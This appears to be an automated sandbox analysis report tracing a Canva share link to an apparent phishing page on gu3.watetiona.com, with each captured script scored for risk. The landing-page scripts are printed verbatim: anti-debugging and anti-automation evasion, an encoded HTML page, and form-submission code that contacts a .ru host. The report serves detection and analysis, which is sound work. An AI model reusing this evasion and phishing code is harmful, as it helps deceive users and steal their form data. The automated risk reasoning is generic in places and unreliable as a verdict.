URL: https://www.canva.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://www.canva.com
URL: https://www.canva.com/link?target=https%3A%2F%2Fgu... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and interaction with suspicious domains. While some of the behavior may be related to legitimate functionality, the overall risk profile is concerning and requires further investigation." }
(function() {window['__canva_public_path__'] = 'https:\/\/static.canva.com\/web\/'; window['bootstrap'] = JSON.parse('{"base":{"A?":"B","L":false,"N":false,"E":"2dd4511b4a17b268cf3334e18becbe1de1e1270a","K":1734128130,"F":{"A?":"C","b":"https://c50fa9f3bfcc4ee3bd4a5eca6add3a1b@o13855.ingest.sentry.io/5403944","c":0.2,"f":false,"g":"A","i":[],"j":{"A":true},"k":{"A":false,"B":100,"C":30,"D":10},"l":[],"m":0.2},"G":"CLIENT_FULL","I":"A","O":{"A?":"B"},"M":"/_online","R":{"O":false,"L":false,"M":false,"A":false,"B":false,"G":false,"N":false,"C":"https://www.canva.com/policies/cookies-policy/","I":"https://www.canva.com/manage-cookies/","J":"https://www.canva.com/policies/privacy-policy/","E":[{"A":"B","B":"Canva"},{"A":"B","B":"Castle"},{"A":"B","B":"Cloudflare"},{"A":"B","B":"Google Firebase Crashlytics"},{"A":"B","B":"Google Login"},{"A":"B","B":"Sentry"},{"A":"B","B":"Stripe"},{"A":"C","B":"Canva"},{"A":"C","B":"Branch"},{"A":"C","B":"Drift"},{"A":"C","B":"Optimizely"},{"A":"C","B":"Ada"},{"A":"D","B":"Canva"},{"A":"D","B":"BEN 605"},{"A":"D","B":"Fullstory"},{"A":"D","B":"Google Analytics"},{"A":"D","B":"Google Firebase Analytics"},{"A":"D","B":"Google Firebase Crashlytics"},{"A":"D","B":"Google Firebase Performance"},{"A":"D","B":"Google Optimize"},{"A":"D","B":"Hotjar"},{"A":"D","B":"Innovid"},{"A":"D","B":"LiveRamp"},{"A":"D","B":"Metadata"},{"A":"D","B":"Rokt"},{"A":"E","B":"Amazon"},{"A":"E","B":"Apple Search Ads"},{"A":"E","B":"Appsflyer"},{"A":"E","B":"Baidu"},{"A":"E","B":"Braze"},{"A":"E","B":"Canva"},{"A":"E","B":"Facebook"},{"A":"E","B":"Facebook SDK"},{"A":"E","B":"Google Ads"},{"A":"E","B":"Google DoubleClick"},{"A":"E","B":"Google Firebase"},{"A":"E","B":"Google Tag Manager"},{"A":"E","B":"LinkedIn Insights"},{"A":"E","B":"Microsoft Advertising"},{"A":"E","B":"Outbrain"},{"A":"E","B":"Pardot"},{"A":"E","B":"Pinterest Ads"},{"A":"E","B":"Snapchat"},{"A":"E","B":"TikTok"},{"A":"E","B":"Twitter"},{"A":"E","B":"Yahoo Ad Exchange"},{"A":"E","B":"Youtube"}],"P":[],"Q":[],"T":false,"U":false},"U":[],"V":[],"g":false,"i":false,"a":{"A":"AAQAA1dFQgAA","L":"UAAAAAAAAAA","D":"BAAAAAAAAAA","J":"en","K":"malicious_links","E":"20241211-21","F":"2dd4511","H":{}},"d":{"A":"wss://www.canva.com/_stream","B":{"A":"AAQAA1dFQgAA","I":"UAAAAAAAAAA","D":"BAAAAAAAAAA","E":"en","F":"malicious_links","G":"20241211-21","H":"2dd4511"}},"b":{"A?":"N","C":{"a":"WEB"},"D":{"a":"WEB","b":"US","c":"en","i":"dde49eb7-f0be-4f28-9298-b235ebcc2e88"},"E":{"WKDUI":"A","VSEML":"B","TSQRL":"B","TOMLO":"A","SEOPS":"C","RRSNC":"A","RRSC2":"C","PFDIO":"B","PRFDO":"B","MTSLO":"B","MRCRL":"B","LRCR":"B","LOA":"A","LBFT":"B","LACMC":"B","JLHWN":"B","ERCRO":"B","ENAN":"B","EMSM":"B","ELTPF":"A","ELASO":"B","ELASF":"B","EDSLO":"C","EAIAH":"B","DWCTA":"B","DIOPB":"B","DEPLO":"B","BPHCO":"CP","AHW25":"A","AHPHA":"E","AH1LO":"A","AAEFO":"A"},"I":"web","P":[-58369,785575],"Q":[-33547948,168103],"R":false,"S":false,"f":{"B":{"A":"GTM-TZPTKRR"},"D":{"A":"16859691037","B":"16859691037"}},"k":false,"n":false,"s":false,"u":false},"f":{"B":"320f7332-8571-45d7-b342-c54192dae547","C":false}},"page":{"A":"https://gu3.watetiona.com/YEcft/","B":"C","C":"DAGZLjls8N8"},"ui":{"N":false,"A":true,"B":"A","C":false,"D":false,"K":"A","I":false,"J":false}}'); window['flags'] = JSON.parse('{}'); window['cmsg'] = window['cmsg'] \|\| { locale: "en", strings: {} };window['__batch_chunks__'] = true;})();
URL: https://www.canva.com/link?target=https%3A%2F%2Fgu... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "This script exhibits several moderate-risk behaviors, including the use of an iframe to load external content and the injection of a script element with dynamic code. While the script appears to be related to a challenge platform, the use of obfuscated parameters and the lack of transparency around the external script source raise some concerns. Further investigation may be warranted to determine the legitimacy and intent of this script." }
(function(){function c(){var b=a.contentDocument\|\|a.contentWindow.document;if(b){var d=b.createElement('script');d.nonce='yTIATVEdhB80NZW7RMtpfA';d.innerHTML="window.__CF$cv$params={r:'8f1950319c911891',t:'MTczNDEyODEzMC4wMDAwMDA='};var a=document.createElement('script');a.nonce='yTIATVEdhB80NZW7RMtpfA';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange\|\|function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
URL: https://static.canva.com/web/e15e945e8b4aba4c.runt... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality like analytics or module loading, the overall level of risk is high due to the presence of multiple malicious indicators. Further investigation is recommended to determine the true intent and purpose of this script." }
(()=>{"use strict";var e,t,r,n,o,s={},i={};function a(e){var t=i[e];if(void 0!==t)return t.exports;var r=i[e]={id:e,loaded:!1,exports:{}};return s[e].call(r.exports,r,r.exports,a),r.loaded=!0,r.exports}a.m=s,e=[],a.O=(t,r,n,o)=>{if(!r){var s=1/0;for(f=0;f<e.length;f++){for(var[r,n,o]=e[f],i=!0,c=0;c<r.length;c++)if((!1&o\|\|s>=o)&&Object.keys(a.O).every((e=>a.O[e](r[c]))))r.splice(c--,1);else if(i=!1,o<s)s=o;if(i){e.splice(f--,1);var l=n();if(void 0!==l)t=l}}return t}else{o=o\|\|0;for(var f=e.length;f>0&&e[f-1][2]>o;f--)e[f]=e[f-1];e[f]=[r,n,o]}},a.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return a.d(t,{a:t}),t},r=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,a.t=function(e,n){if(1&n)e=this(e);if(8&n)return e;if("object"==typeof e&&e){if(4&n&&e.__esModule)return e;if(16&n&&"function"==typeof e.then)return e}var o=Object.create(null);a.r(o);var s={};t=t\|\|[null,r({}),r([]),r(r)];for(var i=2&n&&e;"object"==typeof i&&!~t.indexOf(i);i=r(i))Object.getOwnPropertyNames(i).forEach((t=>s[t]=()=>e[t]));return s.default=()=>e,a.d(o,s),o},a.d=(e,t)=>{for(var r in t)if(a.o(t,r)&&!a.o(e,r))Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},a.f={},a.e=e=>Promise.all(Object.keys(a.f).reduce(((t,r)=>(a.f[r](e,t),t)),[])),a.u=e=>{if(869===e)return"49bc0313ef28938b.js";if(8772===e)return"6e0349ed921a6e5a.vendor.js";if(8269===e)return"551e15a41cea318d.vendor.js";if(7689===e)return"71f6dba82cb18a30.js";if(9739===e)return"7061d3365d215651.js";if(4450===e)return"3c81bc43e42d18ff.js";if(1417===e)return"e23d84774e85fdfd.js";if(8661===e)return"0f33488ee7b6fcd6.js";if(609===e)return"4414de48e8bb5082.js";if(6590===e)return"7cef7f9212754ad4.js";if(8723===e)return"e96b22cbf4318fac.js";if(1902===e)return"850ef10f3a28f00b.js";if(1333===e)return"e554dc07f97114a0.js";if(5111===e)return"6cd6a675535089c7.js";if(7738===e)return"d566e52e84b25ed6.js";if(5274===e)return"3b2dc91ebf320bbe.js";if(6789===e)return"c3eda74280d7f875.js";if(8202===e)return"7b8970343d6e320f.js";if(8703===e)return"9f2c0bc31661107f.js";if(3565===e)return"9acabb0ad3cb7c97.js";if(8504===e)return"c5392eddba834fc0.vendor.js";if(8325===e)return"6e6edc9904e8bf05.vendor.js";if(675===e)return"7ff9c24c22c6dfc2.vendor.js";if(3461===e)return"bd009dd261a60a6c.vendor.js"},a.miniCssF=e=>{if(869===e)return"1fb74b295fc96ed3.ltr.css";if({8772:1,8269:1,8504:1,8325:1,675:1,3461:1}[e])return"ef46db3751d8e999.vendor.ltr.css";if({7689:1,9739:1,4450:1,1417:1,8661:1,609:1,6590:1,8723:1,1902:1,1333:1,5111:1,7738:1,5274:1,6789:1,8202:1,8703:1,3565:1}[e])return"ef46db3751d8e999.ltr.css"},a.miniCssFRtl=e=>{if(8581===e)return"c166e5d20ad58f4e.runtime.rtl.css";if({2653:1,5436:1,8772:1,8269:1,8504:1,8325:1,675:1,3461:1}[e])return"c166e5d20ad58f4e.vendor.rtl.css";if(1389===e)return"lrxlcv.ef9986483991efc0.rtl.css";if(869===e)return"32263809e6e6c7dc.rtl.css";if({7689:1,9739:1,4450:1,1417:1,8661:1,609:1,6590:1,8723:1,1902:1,1333:1,5111:1,7738:1,5274:1,6789:1,8202:1,8703:1,3565:1}[e])return"c166e5d20ad58f4e.rtl.css"},a.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),a.hmd=e=>{if(!(e=Object.create(e)).children)e.children=[];return Object.defineProperty(e,"exports",{enumerable:!0,set:()=>{throw new Error("ES Modules may not assign module.exports or exports.*, Use ESM export syntax, instead: "+e.id)}}),e},a.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),n={},o="@canva/web:",a.l=(e,t,r,s)=>{if(!n[e]){var i,c;if(void 0!==r)for(var l=document.getElementsByTagName("script"),f=0;f<l.length;f++){var u=l[f];if(u.getAttribute("src")==e\|\|u.getAttribute("data-webpack")==o+r){i=u;break}}if(!i){if(c=!0,(i=document.createElement("script")).charset="utf-8",i.timeout=120,a.nc)i.setAttribute("nonce",a.nc);i.setAttribute("data-webpack",o+r),i.src=e}n[e]=[t];var d=(t,r)=>{i.onerror=i.onload=null,clearTimeout(h);var o=n[e];if(delete n[e],i.parentNode&&i.parentNode.removeChild(i),o&&o.forEach((e=>e(r))),t)return t(r
URL: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "You are about to leave Canva", "prominent_button_name": "Continue to external site", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document Model: Joe Sandbox AI	{ "brands": "unknown" }

URL: https://gu3.watetiona.com/YEcft/... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an external domain. While the intent behind the script is not entirely clear, the combination of these behaviors suggests a high likelihood of malicious or suspicious activity." }
if (navigator.webdriver \|\| window.callPhantom \|\| window._phantom \|\| navigator.userAgent.includes("Burp")) { window.location = "about:blank"; } document.addEventListener('keydown', function(event) { if (event.keyCode === 123) { event.preventDefault(); return false; } if ( (event.ctrlKey && event.keyCode === 85) \|\| (event.ctrlKey && event.shiftKey && event.keyCode === 73) \|\| (event.ctrlKey && event.shiftKey && event.keyCode === 67) \|\| (event.ctrlKey && event.shiftKey && event.keyCode === 74) \|\| (event.ctrlKey && event.shiftKey && event.keyCode === 75) \|\| (event.ctrlKey && event.keyCode === 72) \|\| (event.metaKey && event.altKey && event.keyCode === 73) \|\| (event.metaKey && event.altKey && event.keyCode === 67) \|\| (event.metaKey && event.keyCode === 85) ) { event.preventDefault(); return false; } }); document.addEventListener('contextmenu', function(event) { event.preventDefault(); return false; }); xnJMbOAjTo = false; (function meFXXKXEuN() { let fOyzDkLGgS = false; const qxnpakoaAJ = 100; setInterval(function() { const xBbKyYnxAr = performance.now(); debugger; const UFhanXDYTp = performance.now(); if (UFhanXDYTp - xBbKyYnxAr > qxnpakoaAJ && !fOyzDkLGgS) { xnJMbOAjTo = true; fOyzDkLGgS = true; window.location.replace('https://powerbi.microsoft.com'); } }, 100); })();
URL: https://gu3.watetiona.com/YEcft/... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution." }
if(atob("aHR0cHM6Ly9HVTMud2F0ZXRpb25hLmNvbS9ZRWNmdC8=") == "nomatch"){ document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNpRkVNdlFUUVliIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2lGRU12UVRRWWIgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2lGRU12UVRRWWIgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojaUZFTXZRVFFZYiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2lGRU12UVRRWWIuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTEwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNpRkVNdlFUUVliIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGFudDt9DQpAbWVkaWEgKG1pbi13aWR0aDo5OTJweCl7DQojaUZFTXZRVFFZYiAuY29sLWxnLTR7ZmxleDowIDAgYXV0bzt3aWR0aDozMy4zMzMzMzMzMyU7fQ0KfQ0KI2lGRU12UVRRWWIgLmRpc3BsYXktNCB7Zm9udC1zaXplOiAxLjI1cmVtIWltcG9ydGFudDt9DQojaUZFTXZRVFFZYiAubXQtMiB7bWFyZ2luLXRvcDogMC41cmVtIWltcG9ydGFudDt9DQojaUZFTXZRVFFZYiAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI2lGRU12UVRRWWIgLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI2lGRU12UVRRWWIubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNpRkVNdlFUUVliIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojaUZFTXZRVFFZYiAjdEJ0S1lnQ2pPTSB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NCkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzUpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDcyKSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5hbHRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgK
URL: https://gu3.watetiona.com/YEcft/... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `turnstile.render()` function, which can execute arbitrary code, and it sends user data to an unknown domain. Additionally, the script redirects the user to the 'powerbi.microsoft.com' domain, which is inconsistent with the apparent purpose of the script. These behaviors indicate a high likelihood of malicious intent, warranting a high-risk score." }
turnstile.render('#cf', { sitekey: '0x4AAAAAAAw5YGYNAF7ooivG', 'error-callback': JHJOWdhubi, callback: zHXBTdzXcs, }); function JHJOWdhubi() { turnstile.reset(); } function zHXBTdzXcs() { var GsCItrzkrI = document.getElementById("OzawRNrpvK"); GsCItrzkrI.onsubmit = function (event) { event.preventDefault(); }; document.getElementById("pagelink").value = 'bS6CJ'; var giieFXMUCt = "../fsmYFP6tqgOROnk5k24wCogk5rceb9TidOjPD48"; fetch('https://5IGcqa810yP2RCmGvoHmmEoEWKmYVjBW4uVF8UAagN99DurqRLoBvM.birsbunh.ru/gfagovpgbqjnsytbvnjrfioErEYGZgOTwRQJQTNZMTJCZCLIAJGTVPOSBZ', { method: "GET", }).then(response => { return response.text() }).then(text => { if(text == 0){ fetch(giieFXMUCt, { method: "POST", body: new FormData(GsCItrzkrI) }).then(response => { return response.json(); }).then(data => { if(data['status'] == 'success'){ if(xnJMbOAjTo == false){ location.reload(); } } if(data['status'] == 'error'){ window.location.replace('https://powerbi.microsoft.com'); } }); } if(text != 0){ window.location.replace('https://powerbi.microsoft.com'); } }) .catch(error => { window.location.replace('https://powerbi.microsoft.com'); }); }
URL: https://static.canva.com/web/e23d84774e85fdfd.js... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The provided JavaScript snippet appears to be a part of a larger web application, potentially related to the Canva platform. While it does not exhibit any high-risk indicators, such as dynamic code execution or data exfiltration, it does contain some moderate-risk behaviors, including external data transmission and the use of a set of event names that could be used for tracking user interactions. Additionally, the use of the `webpackChunk` pattern suggests that this is a part of a larger, potentially complex application. Further review of the full context and usage of this script would be necessary to determine the overall risk level accurately." }
(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] \|\| []).push([[1417],{ /***/ 399744: function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 \|\| {};(function(__c) {__c.pq=new Set("design_create design_first_edited design_open design_opened design_publish editor_template_applied mobile_design_create_enriched new_event_partnership_artwork_created partnership_artwork_created post_publish_dialog_clicked printegration_page_content_selected printegration_page_loaded publish_button_clicked publish_completed publish_endpoint_clicked publish_print_confirm_bleed_continue_clicked publish_print_confirm_order_details_continue_clicked publish_print_funnel_step_selected publish_print_funnel_step_selected_v2 publish_print_margin_check_continue_clicked publish_print_panel_shown publish_print_proof_pdf_download publish_print_proof_review_continue_clicked publish_print_resolution_check_continue_clicked publish_print_shipping_details_continue_clicked signup_completed".split(" ")); }).call(self, self._fe4d99ebe0d2d259646a80d250150d47);} }]) //# sourceMappingURL=sourcemaps/e23d84774e85fdfd.js.map
URL: https://static.canva.com/web/387e316e7fce97e3.vend... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The provided JavaScript snippet appears to be a part of a larger application, potentially a web application. It contains some behaviors that warrant further review, but there are no clear indications of malicious intent. The script uses some legacy practices, such as the `XDomainRequest` API, which poses minor risks but is not inherently malicious. It also includes some external data transmission and DOM manipulation, which could be part of legitimate functionality, but should be reviewed for potential abuse. Overall, the script requires further investigation to determine the full context and intent, but it does not immediately present a high-risk profile." }
/! For license information please see 387e316e7fce97e3.vendor.js.LICENSE.txt / "use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web\|\|[]).push([[2653],{40749:(e,t,n)=>{n(366995)},736241:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,fv:()=>s.f,jd:()=>l.O});n(454648);var r,a=n(404935),i=n(695578),o=(n(366995),n(775328)),l=n(751586),u=n(364620),s=(n(40749),n(818321));n(948591),n(24765);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},364620:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(775328),l=n(366995),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))\|\|void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function"==typeof i.forwardRef&&(0,i.forwardRef)((function(e){return null})).$$typeof,f=u?Symbol.for("react.memo"):"function"==typeof i.memo&&(0,i.memo)((function(e){return null})).$$typeof;function d(e,t){var n;if(f&&e.$$typeof===f)throw new Error("[mobx-react-lite] You are trying to use `observer` on a function component wrapped in either another `observer` or `React.memo`. The observer already applies 'React.memo' for you.");if((0,o.F)())return e;var r=null!==(n=null==t?void 0:t.forwardRef)&&void 0!==n&&n,a=e,u=e.displayName\|\|e.name;if(c&&e.$$typeof===c&&(r=!0,"function"!=typeof(a=e.render)))throw new Error("[mobx-react-lite] `render` property of ForwardRef was not a function");var d,h,v=function(e,t){return(0,l.S)((function(){return a(e,t)}),u)};return v.displayName=e.displayName,s&&Object.defineProperty(v,"name",{value:e.name,writable:!0,configurable:!0}),e.contextTypes&&(v.contextTypes=e.contextTypes),r&&(v=(0,i.forwardRef)(v)),v=(0,i.memo)(v),d=e,h=v,Object.keys(d).forEach((function(e){p[e]\|\|Object.defineProperty(h,e,Object.getOwnPropertyDescriptor(d,e))})),v}var p={$$typeof:!0,render:!0,compare:!0,type:!0,displayName:!0}},775328:(e,t,n)=>{n.d(t,{D:()=>a,F:()=>i});var r=!1;function a(e){r=e}function i(){return r}},24765:(e,t,n)=>{n.d(t,{A:()=>i});var r=n(42782),a=n(875604);function i(e){var t=(0,a.useState)((function(){return(0,r.LO)(e,{},{deep:!1})}))[0];return(0,r.z)((function(){Object.assign(t,e)})),t}},818321:(e,t,n)=>{n.d(t,{f:()=>i});var r=n(42782),a=n(875604);function i(e,t){return(0,a.useState)((function(){return(0,r.LO)(e(),t,{autoBind:!0})}))[0]}},948591:(e,t,n)=>{n(42782),n(875604),n(24765)},366995:(e,t,n)=>{n.d(t,{S:()=>c});var r=n(42782),a=n(875604),i=n(56225),o=n(775328),l=n(751586),u=n(434366);function s(e){e.reaction=new r.le("observer".concat(e.name),(function(){var t;e.stateVersion=Symbol(),null===(t=e.onStoreChange)\|\|void 0===t\|\|t.call(e)}))}function c(e,t){if(void 0===t&&(t="observed"),(0,o.F)())return e();var n=a.useRef(null);if(!n.current){var r={reaction:null,onStoreChange:null,stateVersion:Symbol(),name:t,subscribe:function(e){return l.O.unregister(r),r.onStoreChange=e,r.reaction\|\|(s(r),r.stateVersion=Symbol()),function(){var e;r.onStoreChange=null,null===(e=r.reaction)\|\|void 0===e\|\|e.dispose(),r.reaction=null}},getSnapshot:function(){return r.stateVersion}};n.current=r}var c,f,d=n.current;if(d.reaction\|\|(s(d),l.O.register(n,d,d)),a.useDebugValue(d.reaction,i.e),(0,u.useSyncExternalStore)(d.subscribe,d.getSnapshot,d.getSnapshot),d.reaction.track((function(){try{c=e()}catch(t){f=t}})),f)throw f;return c}},880207:(e,t,n)=>{n.d(t,{SB:()=>a});var r=function(){function e(e){var t=this;Object.defineProperty(this,"finalize",{enumerable:!0,configurable:!0,writable:!0,value:e}),Object.defineProperty(this,"registrations",{enumerable:!0,configurable:!0,writable:!0,value:new Map}),Object.defineProperty(this,"sweepTimeout",{enumerable:!0,configurable:!0,writable:!0,value:void 0}),Object.defineProperty(this,"sweep",{enumerable:!0,configurable:!0,writable:!0,value:function(e){void 0===e&&(e=1e4),clearTimeout(t.sweepTimeout),t.sweepTimeout=void 0;var n=Date.now();t.registrations.forEach((function(r,a){n-r.registeredAt>=e&&(t.finalize(r.value),t.registrations.delete(a))})),t.registrations.size>0&
URL: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "You are about to leave Canva", "prominent_button_name": "Continue to external site", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document Model: Joe Sandbox AI	{ "brands": [ "Canva" ] }

URL: https://static.canva.com/web/lrxlcv.e497b66b88fd86... Model: Joe Sandbox AI	```json { "risk_score": 1, "reasoning": "The script appears to be part of a webpack bundle for a web application, likely for a legitimate purpose such as loading or managing modules. There are no high-risk indicators like dynamic code execution or data exfiltration. The code is not obfuscated, and there are no suspicious domain interactions. The use of legacy practices or tracking behavior is not evident. Overall, the script seems benign with no harmful intent." }
